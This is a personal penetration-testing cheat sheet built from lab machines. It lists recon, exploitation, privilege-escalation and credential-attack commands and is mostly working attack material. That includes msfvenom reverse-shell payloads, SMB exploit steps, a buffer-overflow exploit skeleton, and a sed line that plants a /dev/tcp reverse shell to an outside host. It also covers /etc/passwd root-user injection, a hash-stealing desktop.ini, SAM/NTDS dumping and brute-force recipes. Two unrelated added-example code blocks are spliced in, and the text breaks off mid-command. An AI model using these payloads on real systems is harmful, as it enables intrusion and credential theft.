The goal of this repository is to centralize everything that I have learned. This includes knowledge about system administration, pentesting, and much more.
Methodology
Reconnaissance
Passive
OSINT
- https://github.com/Josue87/MetaFinder
- https://github.com/khast3x/h8mail
- https://github.com/initstring/cloud_enum
- https://github.com/OWASP/Amass
- https://github.com/aboul3la/Sublist3r
- https://dnsdumpster.com/
- https://github.com/six2dez/reconftw
Active
Windows
SMB
- check null sessions
RID cycling
lookupsid.py guest:@192.168.240.172 -> RID cycling
Exploits
- check which exploit is available
nmap -p 139,445 --script 'smb-vuln*' $IP
Running Windows XP -> MS08-067 vulnerable -> exploit 40279 from exploit-db (oscp alice) https://www.exploit-db.com/exploits/40279
Running Windows 10 (security patch released in March 2020) -> CVE-2020-0796 https://github.com/danigargu/CVE-2020-0796
replace shellcode in exploit.cpp (line 204):
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$(iptun) LPORT=8081 -f dll -f csharp
SMBv1 -> ms17-010 https://github.com/3ndG4me/AutoBlue-MS17-010
-> SMB Remote Code Execution (MS17-010) https://0xdf.gitlab.io/2021/05/11/htb-blue.html https://github.com/worawit/MS17-010 https://github.com/helviojunior/MS17-010
git clone https://github.com/helviojunior/MS17-010; cd MS17-010
msfvenom -p windows/shell_reverse_tcp -f exe EXITFUNC=thread LHOST=$(iptun) LPORT=445 -o rev.exe
python2 send_and_execute.py $IP rev.exe
- SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497) MS09_050
python2 -m pip install pysmb
searchsploit -m 40280.py
msfvenom -p windows/shell_reverse_tcp LHOST=$(iptun) LPORT=443 EXITFUNC=thread -f python
A major pain to do without msfconsole... exploit(windows/smb/ms09_050_smb2_negotiate_func_index)
DNS Poisoning
intercept hashes with Responder -> incoming connections can also be used for enumeration
sudo python Responder.py -I tun0 --lm
Kerberos
Kerbrute
kerbrute_linux_amd64 userenum -d DANTE.local /opt/SecLists/Usernames/xato-net-10-million-usernames.txt --dc 172.16.1.20 --output recon/kerbrute-usernames
Enumeration
API
- check all HTTP methods on each endpoint
Listening ports
netstat -ano | findstr /i /c:"listen"
netstat -tulpn
WMIC path win32_process get Caption,Processid,Commandline
Windows
- list drives
wmic logicaldisk get caption,description,providername
- list installed patches
wmic qfe list full /format:list
- list installed applications
wmic product get name,version
wmic product get name,version,installlocation
- list services
net start
wmic service get DisplayName,name,startname
wmic service get DisplayName,name,startname,pathname
wmic service get name,displayname,pathname,startmode |findstr /i "auto"
- query config of service
sc qc upnphost
- update service binary path
sc config upnphost binpath= "C:\Inetpub\Scripts\rv.exe"
- change user running service
sc config upnphost obj= ".\LocalSystem" password= ""
cmd.exe /c sc queryex state=all type=service
Get-Service | findstr -i "manual"
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "manual"} | select PathName,DisplayName,Name
Exploitation
Linux
Kernel
Kernel exploits
Linux ucal 3.0.0-12 -> mempodipper -> compile locally -> upload
Windows
Binary Exploitation
Buffer Overflow
Stack based
mona.py TL;DR
- Configure work folder
!mona config -set workingfolder c:\mona\%p
- Generate local array that mona will use to determine bad char
!mona bytearray -b "\x00"
- Compare local array with ESP to identify bad chars
!mona compare -f C:\mona\<PATH>\bytearray.bin -a <ESP address>
- Generate a new local array without the identified bad chars
!mona bytearray -b "\x00 + <BAD_CHARS>"
- Repeat steps 2 through 4 until there are no more bad chars
- Search for a jmp esp instruction in the binary
!mona jmp -r esp -cpb "<BAD_CHARS>"
- Generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=$(iptun) LPORT=443 EXITFUNC=thread -f python -v shellcode -b '\x00'
- Done
Skeleton code sample
```python
from pwn import *

ip = '127.0.0.1'
port = 4444
username = 'username'


def pdecode(data):
    print(data.decode('utf8'))


def getchars():
    all_chars = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    all_chars += b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    all_chars += b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    all_chars += b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    all_chars += b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    all_chars += b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    all_chars += b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    all_chars += b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    all_chars += b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    all_chars += b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    all_chars += b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    all_chars += b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    all_chars += b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    all_chars += b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    all_chars += b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    all_chars += b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
    return all_chars


# open connection
s = remote(ip, port)
# receive username prompt
rep = s.recv(1024)
pdecode(rep)
# send username
s.send(f'{username}\n')
# receive password prompt
rep = s.recv(1024)
pdecode(rep)
# bof is in password -> increment until crash -> use the content of EIP to find the size of the offset cyclic_find(hex value)
offset = cyclic_find(hex value)  # 1028
# data = cyclic(1100)
# eip = b'AAAA' -> !mona jmp -r esp -cpb "\x00"
eip = p32(0x10476D73)
payload = getchars()
# Generate shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.88.128 LPORT=1234 -b "\x00" -f python
buf = b""
# [...]
lpayload = len(payload)
lnop = 64
nop_slide = lnop * b'\x90'
# data = cyclic(offset) + eip + payload
data = cyclic(offset) + eip + nop_slide + buf
# data = b'\x90' * offset + eip
s.send(data + b'\n')
rep = s.recv(1024)
pdecode(rep)
# close connection
s.close()
```
- Liodeus. Buffer Overflow personal cheatsheet. Updated August 11, 2020. Accessed August 21, 2022. https://liodeus.github.io/2020/08/11/bufferOverflow.html
Container
is container privileged? -> mount host filesystem (check PG Practice Sirol)
LFI-RFI
- check iptable rules for outgoing port filtering → /etc/iptables/rules.v4 → /etc/iptables/rules.v6
Windows
- identify usernames -> check if they have an ssh key (c:\users\viewer\.ssh\id_rsa)
Client-Side
Macro
- Refer to pg/hepet
- Generate the payload
msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=443 -f hta-psh -o evil.hta
VBA has a 255-character limit for literal strings, but this restriction does not apply to strings stored in variables.
Python script to split the payload into fixed-size chunks (n = 50 characters per line here, well under the 255-character limit):
```python
#!/usr/bin/env python3
import re

hta_file = 'evil.hta'
payload_pattern = '"(powershell.exe .*?)"'
with open(hta_file, 'r') as f:
    content = f.read()
# first quoted "powershell.exe ..." string in the .hta is the payload
payload = re.findall(payload_pattern, content)[0]
lpayload = len(payload)
n = 50
for i in range(0, lpayload, n):
    chunk = payload[i:i+n]
    print(f'Str = Str + "{chunk}"')
```
To assign the macro to the document:
- Create macro
- quit macro page
- in workbook ->
- Tools -> Customize -> Events -> Open document
https://github.com/Greenwolf/ntlm_theft
- Evil desktop.ini to collect hashes
mkdir secrets
attrib +s secrets
cd secrets
echo [.ShellClassInfo] > desktop.ini
echo IconResource=\\responder.local\poc >> desktop.ini
attrib +s +h desktop.ini
RCE
- in doubt, use full path (Windows, Linux)
Post-Exploitation
Privilege Escalation
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
- find files modified in the last 15 minutes
find / -xdev -mmin -15 -type f -ls 2>/dev/null
- find files accessed in the last 15 minutes
find / -xdev -amin -15 -type f -ls 2>/dev/null
- installed patches
wmic qfe list
permissions
check whether /etc/passwd and /etc/shadow are writable
echo "root2:$(openssl passwd 'mrcake'):0:0:root:/root:/bin/bash" >> /etc/passwd
find / -xdev -type f -writable 2>/dev/null
SUID
- cp # https://gtfobins.github.io/gtfobins/cp/
LFILE=/etc/passwd
echo "pwn:$(openssl passwd 'mrcake'):0:0:root:/root:/bin/bash" | cp /dev/stdin "$LFILE"
Unquoted Service Path
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
- wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\" |findstr /i /v """
given the unquoted service path
C:\Program Files\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
Windows will try to run, in order:
- C:\Program.exe
- C:\Program Files\Foxit.exe
- C:\Program Files\Foxit Software\Foxit.exe
- C:\Program Files\Foxit Software\Foxit Reader\Foxit.exe
- C:\Program Files\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
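The probing order above is easy to get wrong when auditing a host by hand. The script below is an added example (not part of these notes) that reproduces the rule: for each service whose PathName is unquoted and contains spaces, it lists the executables Windows would try before the intended image, and flags the service. The service list is constructed sample data in the shape of `wmic service get name,pathname`, not output from a real host; the function names are my own.

```python
import re

# Constructed sample (service name, PathName) pairs; names and paths are invented.
SAMPLE_SERVICES = [
    ("FoxitCloudUpdate",
     r"C:\Program Files\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe"),
    ("VendorAgent", r"C:\Program Files\Vendor\agent.exe -service"),
    ("QuotedSvc", r'"C:\Program Files\Good Vendor\goodsvc.exe" -service'),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("NoSpaceSvc", r"C:\Tools\nospace.exe"),
]


def hijack_candidates(pathname):
    """Return, in order, the executables Windows probes before reaching the
    intended image of an unquoted service path containing spaces.

    A quoted path, or a path without spaces, is unambiguous and yields [].
    """
    p = pathname.strip()
    if not p or p.startswith('"'):
        return []
    # Only the image path matters: drop any arguments after the first ".exe".
    m = re.search(r"\.exe\b", p, re.IGNORECASE)
    image = p[:m.end()] if m else p
    if " " not in image:
        return []
    parts = image.split(" ")
    # Every prefix that ends at a space is tried as "<prefix>.exe" first.
    candidates = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    candidates.append(image)
    return candidates


def audit_services(services, skip_windows_dir=True):
    """Return [(name, candidates)] for services with an exploitable PathName.

    Mirrors the findstr /v "C:\\Windows\\" filter of the wmic one-liner:
    services living under C:\\Windows are skipped by default.
    """
    findings = []
    for name, pathname in services:
        if skip_windows_dir and pathname.lstrip('"').lower().startswith("c:\\windows\\"):
            continue
        cands = hijack_candidates(pathname)
        if cands:
            findings.append((name, cands))
    return findings


if __name__ == "__main__":
    for name, cands in audit_services(SAMPLE_SERVICES):
        print(f"[!] {name}: unquoted path with spaces; Windows probes in order:")
        for c in cands:
            print(f"      {c}")
```

Remediation for a flagged service is to quote the image path in its configuration and to make sure the directories along the path are not writable by unprivileged users; the candidate list tells you exactly which directories to check.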
- windows-exploit-suggester
- sherlock
- winpeas*.exe (has more information than .bat version)
- windows-exploit-suggester-new-generation (wesng) https://github.com/bitsadmin/wesng
- check architecture (386, x64) -> 32 bits binaries are in certain path and 64 bits somewhere else # https://ss64.com/nt/syntax-64bit.html
| | 32 bit folder | 64 bit folder |
|---|---|---|
| 32 bit session | C:\Windows\system32\ | C:\Windows\sysNative\ |
| 64 bit session | C:\Windows\sysWOW64\ | C:\Windows\system32\ |
do not forget to prefix .\ to run binaries
--- windows 2k3 seimpersonate -> https://github.com/egre55/windows-kernel-exploits https://github.com/Re4son/Churrasco
--- windows 10 -> smbghost https://github.com/danigargu/CVE-2020-0796 replace shellcode in exploit.cpp (line 204):
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$(iptun) LPORT=8081 -f dll -f csharp
--- windows 10 + windows server 2016 + windows server 2019 https://github.com/itm4n/PrintSpoofer
--- serestoreprivilege: run EnableSeRestorePrivilege.ps1 to enable this privilege in our PowerShell session; we then have write access to C:\Windows\System32 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md https://github.com/xct/SeRestoreAbuse
--- sebackupprivilege
echo 'set verbose onX' > script.txt
echo 'set metadata C:\Windows\Temp\meta.cabX' >> script.txt
echo 'set context clientaccessibleX' >> script.txt
echo 'set context persistentX' >> script.txt
echo 'begin backupX' >> script.txt
echo 'add volume C: alias cdriveX' >> script.txt
echo 'createX' >> script.txt
echo 'expose %cdrive% E:X' >> script.txt
echo 'end backupX' >> script.txt
diskshadow /s script.txt
dir e:
robocopy /b e:\windows\ntds . ntds.dit
--- requires cmd interactive shell
ntdsutil
activate instance ntds
ifm
create full c:\ntdsutil
quit
quit
wbadmin start backup -backuptarget:\\$(iptun)\tools -include:c:\windows\ntds
--- sebackupprivilege
reg save hklm\sam sam.reg
reg save hklm\system system.reg
pypykatz registry --sam sam.reg system.reg
--- sebackupprivilege NTDS.dit https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Copy-VSS.ps1
import-module .\Copy-VSS.ps1
Copy-VSS.ps1
--- Privileges -> Attack https://github.com/gtworek/Priv2Admin
--- always install elevated
Set the right arch!
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST=$(iptun) LPORT=80 --encoder x64/xor --iterations 9 --format msi --out AlwaysInstallElevated.msi
msiexec /quiet /qn /i c:\users\shenzi\alwe.msi
Exfiltration
- https://book.hacktricks.xyz/generic-methodologies-and-resources/exfiltration
PowerShell
- PS Drive
New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
Infiltration
- https://blog.ropnop.com/transferring-files-from-kali-to-windows
- https://sushant747.gitbooks.io/total-oscp-guide/transfering_files_to_windows.html
Password
- /opt/SecLists/Passwords/probable-v2-top12000.txt:2037
- /opt/SecLists/Passwords/Common-Credentials/10-million-password-list-top-10000.txt
- /opt/SecLists/Passwords/xato-net-10-million-passwords.txt
- /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
try to login with:
- appname:appname
- webservice:webservice
- username:username
- try password combination using the software name (jenkins:jenkins, nexus:nexus, webmail:webmail)
- try known passwords for protected archives or documents
Restricted Shell
- https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
- https://0xffsec.com/handbook/shells/restricted-shells/
- https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/
lshell
- https://www.aldeid.com/wiki/Lshell
echo os.system('/bin/bash')
vim
:set shell=/bin/bash
:shell
rbash
https://www.hacknos.com/rbash-escape-rbash-restricted-shell-escape/
- get list of commands
compgen -c
export PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:$PATH
rshell
find / -name test -exec /bin/bash \;
Reverse Shell
- Should outgoing ports be filtered, try ports that are in use by the machine. For example:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-13 21:01 EDT
Nmap scan report for 192.168.54.64
Host is up (0.049s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
8003/tcp open mcreport
use port 21,22,139,445,3306,8003
Active Directory
- PowerView to abuse AD
- 2021 DA takeover with domain account https://github.com/Ridter/noPac
Tools
Linux
autorecon
Examples:
autorecon $TARGET --global.domain $TARGET_DOMAIN.TLD --single-target
bloodhound.py
bloodhound-python -u "$TARGET_USER" -p "$TARGET_PASSWORD" --dns-tcp -d "$TARGET_DOMAIN.TLD" -c all -dc "$TARGET_DOMAIN_FQDN" -ns "$DNS_IP"
bloodhound-python -u anirudh -p 'SecureHM' -c ALL -d vault.offsec -dc dc.vault.offsec -ns $IP
cadaver
cadaver <ip address>
certbox
certbot certonly --webroot --preferred-challenges http -d <domain_fqdn> --webroot-path <webroot_path> --agree-tos -m <contact_email_address>
cewl
- Fetch a list of all pages with content (either manually or with feroxbuster), save all words with length >= 5 chars, then run a bruteforce with hydra
for url in $(cat urls.txt); do echo $url && cewl -d 5 $url >> temp_cewl.txt;done
cat temp_cewl.txt | sort -u >> cewl.txt && rm temp_cewl.txt
cewl --depth 5 --min_word_length 5 --with-numbers --write cewl.log
chisel
- To forward a port from the remote host to localhost (kali)
- On kali
chisel_linux server --port 4434 --reverse
./chisel_1.7.7_linux_amd64 server --port 4434 --reverse
- on remote host
chisel_windows client <kali ip>:<kali port> R<kali host ip>:<kali host port>:<remote host ip>:<remote host port>
chisel_windows client 192.168.88.128 R10.10.14.210:4444:127.0.0.1:4444
mingw
sudo apt install mingw-w64
i686-w64-mingw32-gcc main.c -o main.exe
- If winsock.h is required, link ws2_32 -> -lws2_32
i686-w64-mingw32-gcc main.c -o main.exe -lws2_32
crackmapexec
CrackMapExec
- https://www.infosecmatter.com/crackmapexec-module-library/
- Bruteforce with list of users and list of passwords
cme smb 172.16.1.13 -u users -p passwords --shares
- Check null session
cme smb 192.168.240.152 -u ' ' -p '' --shares
crackmapexec smb vault.offsec -u 'guest' -p ''
crackmapexec smb vault.offsec -u 'guest' -p '' --shares
crackmapexec smb vault.offsec -u 'guest' -p '' --rid-brute
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#automate-the-sysvol-and-passwords-research
- check for credentials in sysvol
cme smb ip -u 'user' -p "password" -M gpp_autologin
enum4linux
evil-winrm
- https://linuxcommandlibrary.com/man/evil-winrm
evil-winrm -i 172.16.2.5 -u 'jbercov' -p 'myspace7'
- make powershell script directory available
evil-winrm -i 172.16.2.5 -u 'jbercov' -p 'myspace7' -s /opt/powershell_scripts
feroxbuster
feroxbuster -ekr --wordlist /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://10.10.110.100:65000 -o recon/ferox
feroxbuster -B # to look for .swp files
gobuster
- prepend command with HTTP_PROXY="socks5://127.0.0.1:1337" gobuster...
HTTP_PROXY="socks5://127.0.0.1:1337" gobuster dir -u http://172.16.1.13:80 -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -x html,php,txt,zip,bak | tee recon/port80-raft-words-phphtmltxtzipbak
- custom useragent
-a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36'
hydra
https://github.com/gnebbia/hydra_notes/blob/master/README.md
To check requests with proxy: export HYDRA_PROXY=connect://127.0.0.1:8080
- Wordpress bruteforce on port 65000 with known username
hydra 10.10.110.100 http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:is incorrect." -l james -P /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt -s 65000
watch out for empty lines in the wordlist -> rockyou.txt
- SSH bruteforce with 4 threads
hydra -l james 10.10.110.100 -P /opt/SecLists/Passwords/xato-net-10-million-passwords-1000.txt ssh -t 4
- FTP
hydra -V -L users -P pass ftp://172.16.1.12
hydra -C /opt/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://$IP
- jenkins
proxychains4 -q hydra -V -s 8080 172.16.1.19 http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:Invalid username or password" -L user.txt -P pass -t 10 -w 30
- mssql (single password with -p; -P expects a wordlist file)
hydra -l 'sophie' -p 'TerrorInflictPurpleDirt996655' mssql://172.16.1.5 -V
drupal user enumeration
hydra 10.129.214.154 http-post-form "/user/password:name=^USER^&form_build_id=form-q2OtblVzGPwpntpRLcpH0irZhuK72SVAinIVwJjNAWU&form_id=user_pass&op=E-mail+new+password:is not recognized" -L /opt/SecLists/Usernames/top-usernames-shortlist.txt -e 'n'
iconv
- Convert script to windows encoding (oscp sv-file01)
cat script.ps1 | iconv --to-code UTF-16LE | base64 -w 0
ident-user-enum
https://book.hacktricks.xyz/network-services-pentesting/113-pentesting-ident?q=113
ident-user-enum $IP 22 113 5432 8080 10000
impacket
getaduser
- With creds, pull all the users (oscp sv-file01)
GetADUsers.py -all -dc-ip 10.11.1.20 '
/ '
getnpusers
https://cheatsheet.haax.fr/windows-systems/exploitation/kerberos/
- Use -no-pass if the account has UF_DONT_REQUIRE_PREAUTH
GetNPUsers.py 'dante.admin/jbercov' -no-pass -dc-ip 172.16.2.5
GetNPUsers.py spookysec.local/ -usersfile valid_usernames.txt -dc-ip $IP -no-pass -format hashcat -outputfile asreproastable.log
hashcat -m 18200 asreproastable.log passwordlist.txt
getuserspns
lookupsid
- requires valid user
lookupsid.py guest:@dc
secretsdump
secretsdump.py -sam sam -security security -system system LOCAL
john
- https://www.kali.org/tools/john/
- unshadowed # https://erev0s.com/blog/cracking-etcshadow-john/
unshadow passwd shadow > unshadowed
john --wordlist=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt unshadowed
- crack rar archives
rar2john backup.rar > backup.rar.hash
john backup.rar.hash --format=RAR5 --wordlist=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
kerbrute
- Configure DC and domain in /etc/hosts
192.168.146.122 hutchdc.hutch.offsec hutchdc hutch.offsec
- user enum
kerbrute_linux_amd64 userenum --dc hutchdc -d hutch.offsec /opt/SecLists/Usernames/top-usernames-shortlist.txt
ldapsearch
ldapsearch -x -H ldap://$IP:389 -D '' -w '' -b "DC=hutch,DC=offsec"
metasploit
- run msf with proxychains -> prefix msfconsole with proxychain command
proxychains4 -q msfconsole
msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=$(iptun) LPORT=1234 EXITFUNC=thread -b "\x00" -f python -v
msfvenom -p windows/shell_reverse_tcp LHOST=$(iptun) LPORT=443 EXITFUNC=thread -f exe > IObit.exe
- htb grandpa
msfvenom -p windows/shell_reverse_tcp LHOST=$(iptun) LPORT=443 EXITFUNC=thread -f raw -e x86/alpha_mixed
- linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=$(iptun) LPORT=443 EXITFUNC=thread -f elf > rv
- linux bash
msfvenom -p cmd/unix/reverse_bash LHOST=$(iptun) LPORT=2222 -f raw > shell.sh
- linux x86 shared object
msfvenom -p linux/x86/shell_reverse_tcp LHOST=$(iptun) LPORT=23 EXITFUNC=thread -f elf-so > rv.so
- windows x64
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$(iptun) LPORT=445 -f exe > rv.exe
nmap
- Interactive nse script lookup https://www.infosecmatter.com/nmap-nse-library/
- Get top N UDP ports -- for a udp scan behind a proxy
sort -r -k3 /usr/share/nmap/nmap-services | grep '/udp' | head -n 100 | cut -f 2 | cut -d'/' -f 1 | xargs -I{} echo -n "{},"
openssl
openssl passwd 'password'
openssl rand -hex 32
proxychains
pypykatz
- dump lsass via procdump
pypykatz lsa minidump lsass.dmp
- extract hashes from sam/system registry hives
pypykatz registry --sam sam.reg system.reg
python
- Generate NTLM hash (the NT hash is MD4 over the UTF-16LE password; Python 3 syntax. Note: hashlib.new('md4') raises ValueError on OpenSSL 3 builds where the legacy provider is disabled)
import hashlib, binascii
hash = hashlib.new('md4', "shantewhite".encode('utf-16le')).digest()
print(binascii.hexlify(hash))
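Because hashlib's md4 depends on OpenSSL's legacy provider and is missing on many current Linux builds, the block below is an added example (not from these notes) with a self-contained pure-Python MD4 and the NT hash derived from it. It is the kind of helper a password-audit script needs when checking a dumped hash set against a list of known-weak candidates offline. The function names are my own; the expected values are the RFC 1320 MD4 test vectors and the widely published NT hash of "password".

```python
import struct

_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


# MD4 auxiliary functions F, G, H (RFC 1320, section 3.4)
def _f(x, y, z):
    return (x & y) | ((~x) & z)


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):
    return x ^ y ^ z


# (function, additive constant, shift amounts, message-word order) per round
_ROUNDS = (
    (_f, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
    (_g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
    (_h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
)


def _compress(state, block):
    """Process one 64-byte block into the running (A, B, C, D) state."""
    x = struct.unpack("<16I", block)
    a, b, c, d = state
    for fn, const, shifts, order in _ROUNDS:
        for i, k in enumerate(order):
            a = _rotl((a + fn(b, c, d) + x[k] + const) & _MASK, shifts[i % 4])
            # rotate the registers so the next step updates the next one (A,D,C,B order)
            a, b, c, d = d, a, b, c
    return [(s + v) & _MASK for s, v in zip(state, (a, b, c, d))]


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 digest (16 bytes)."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    bit_len = (len(data) * 8) & 0xFFFFFFFFFFFFFFFF
    # padding: 0x80, zeros up to 56 mod 64, then the 64-bit little-endian bit length
    padded = data + b"\x80"
    padded += b"\x00" * ((56 - len(padded) % 64) % 64)
    padded += struct.pack("<Q", bit_len)
    for off in range(0, len(padded), 64):
        state = _compress(state, padded[off:off + 64])
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), as a lowercase hex string."""
    return md4(password.encode("utf-16le")).hex()


def find_weak(hashes, candidates):
    """Map each NT hash in `hashes` to the candidate password that produces it.

    `hashes` and `candidates` are constructed inputs for an offline audit;
    hashes are compared case-insensitively.
    """
    table = {nt_hash(c): c for c in candidates}
    return {h: table[h.lower()] for h in hashes if h.lower() in table}


if __name__ == "__main__":
    print(nt_hash("shantewhite"))
    # Constructed audit input: one known-weak hash plus one that is not in the list.
    print(find_weak(["8846F7EAEE8FB117AD06BDD830B7586C", "0" * 32], ["password", "letmein"]))
```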
responder
sudo python Responder.py -I tun0
Evil desktop.ini to collect hashes
mkdir secrets
attrib +s secrets
cd secrets
echo [.ShellClassInfo] > desktop.ini
echo IconResource=\\responder.local\poc >> desktop.ini
attrib +s +h desktop.ini
pcredz
https://github.com/lgandx/PCredz
sed
- remove empty lines from stdin
sed '/^$/d'
- insert text at nth line
sed -i '8i system("sh -i >& /dev/tcp/10.10.14.10/443 0>&1")'
- delete nth line
sed -i '8d'
sendmail
sendemail -f 'jonas@localhost' -t 'mailadmin@localhost' -s $IP:25 -u 'Your spreadsheet' -m 'Here is your requested spreadsheet' -a test.ods
smbclient
- list shares
smbclient -L '//192.168.240.152'
- list shares with null session
smbclient -L '//192.168.240.152' -U ' ' -p ''
- Download all files from share recursively without prompt
smbclient //10.11.1.31/wwwroot
smb: > prompt
smb: > mask ""
smb: > recurse ON
smb: > mget *
smbclient //$IP/backup -U 'spookysec.local/svc-admin' --password management2005
smbmap
- smbshare enum recursive with null session
smbmap -H 192.168.240.152 -u ' ' -p '' -R
sqlmap
- Get mysql system user:password
sudo proxychains -q sqlmap -r req.txt -p id --dbms mysql -D mysql -T user -C User -C Password --dump
ssh
https://github.com/opsdisk/the_cyber_plumbers_handbook/blob/master/cph_version_1.4_20210829.pdf
wfuzz
- look for ssrf
wfuzz -z range,0-10000 -u http://dc01.heist.offsec:8080/?url=http://localhost:FUZZ --field url --hh 178435
- dirbuster
wfuzz -z file,/opt/SecLists/Discovery/Web-Content/raft-small-directories.txt -u http://$IP:10000/FUZZ --hh 12
- fuzz json api + proxy
wfuzz -p localhost:8080:HTTP -c -z file,/opt/SecLists/Usernames/top-usernames-shortlist.txt -H 'Content-Type: application/json' -d '{"user":"FUZZ","url":"http://192.168.49.113"}' -u http://$IP:13337/update
windows-exploit-suggester
wes systeminfo.txt --exploits-only --impact "elevation of privilege"
- requires
sudo apt install python-pip # python2 pip
python2 -m pip install xlrd==1.2.0 # https://github.com/AonCyberLabs/Windows-Exploit-Suggester/issues/50
https://github.com/Riqky/Windows-Exploit-Suggester
- needs a fix for io.StringIO
- needs a try except IndexError
- /opt/Windows-Exploit-Suggester/
python3 windows-exploit-suggester.py --update
python3 windows-exploit-suggester.py -i /host/htb/granny/systeminfo.txt --database 2022-06-04-mssb.xls
python /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py -i systeminfo.txt -d /opt/Windows-Exploit-Suggester/2022-06-04-mssb.xlsx
wes.py
- wes --update
- wes systeminfo.txt --impact 'Elevation of Privilege' -s critical
- wes systeminfo.txt --exploits-only
--- impacts: Denial of Service, Elevation of Privilege, Information Disclosure, Remote Code Execution, Security Feature Bypass, Spoofing
--- severities: Critical, Important
wpscan
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://10.10.110.100:65000/wordpress | tee enum/wordpress-full-scan
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://$IP | tee enum/wordpress-full-scan
curl -X POST --data '
